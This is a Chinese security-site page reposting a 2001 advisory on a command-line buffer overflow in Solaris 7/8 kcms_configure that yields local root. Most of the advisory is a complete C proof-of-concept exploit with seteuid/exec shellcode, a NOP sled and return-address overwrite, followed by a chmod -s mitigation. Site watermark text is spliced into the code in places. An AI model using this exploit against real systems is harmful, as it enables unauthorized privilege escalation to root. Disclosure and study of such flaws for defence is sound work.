网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 安全漏洞 > Other > Solaris kcms_configure存在漏洞  

Solaris kcms_configure存在漏洞

2004-04-14  作者:BitsCN整理  来源:中国网管联盟  点评 投稿 收藏

发布时间:2001-04-11
更新时间:2001-04-11
严重程度:高
威胁程度:本地管理员权限
错误类型:输入验证错误
利用方式:服务器模式

受影响系统
Solaris 7/8 (x86 和 sparc)
详细描述
Solaris 7中提供的kcms_configure存在一个缓冲溢出,问题存在于命令行选项解析的时候,通过利用这个漏洞可以导致攻击者获得本地ROOT权利。Kodak Color Management System (KCMS) 在以前还存在几个漏洞。建议关闭这个工具。

测试代码
/*
Command line argument overflow
/usr/openwin/bin/kcms_configure


Proof of Concept Exploitation
Riley Hassell
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>


#define BUFLEN 1100


/* seteuid/exec shellcode */
char shell[] =
"\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05\xe8\xf9\xff\xff\xff"
"\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2\x50\xb0\x8d\xe8\xe0\xff\xff\xff"
"\x29\xc0\x50\xb0\x17\xe8\xd6\xff\xff\xff\xeb\x1f\x5e\x8d\x1e\x89\x5e" 网管bitscn_com
"\x0b\x29\xc0\x88\x46\x19\x89\x46\x14\x89\x46\x0f\x89\x46\x07\xb0"
"\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18\xe8\xdc\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03"
"\x03\x9a\x04\x04\x04\x04\x07\x04";


char buf[BUFLEN];
unsigned long int nop, esp;
long int offset = 0;


unsigned long int get_esp() { __asm__("movl %esp,%eax");}


int main (int argc, char *argv[])
{
  int i;
  if (argc > 1)
  offset = strtol(argv[1], NULL, 0);
  else
 offset = -300;
  nop = 600;
  esp = get_esp();
  memset(buf, 0x90, BUFLEN);
  memcpy(buf+600, shell, strlen(shell));
  for (i = nop+strlen(shell)+1; i <= BUFLEN-4; i += 4)
  *((int *) &buf[i]) = esp+offset;
 buf[BUFLEN-1] = '\0';
网管下载dl.bitscn.com

  execl("/usr/openwin/bin/kcms_configure", "eEye",
"-o","-S","X",buf,NULL);
  return;
}

解决方案
临时建议:chmod –s /usr/openwin/bin/kcms_configure

相关信息
Riley Hassell riley@eeye.com

TAGs漏洞   存在   xff   x04   x46   buf   x01   x03   x02   x89   xeb   xe8    
 上一篇:Solaris Xsun 存在缓冲溢出漏洞   下一篇:talkback.cgi存在任意用户可读文件漏洞
Solaris kcms_configure存在漏洞 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
最新推荐文章:
网管论坛交流: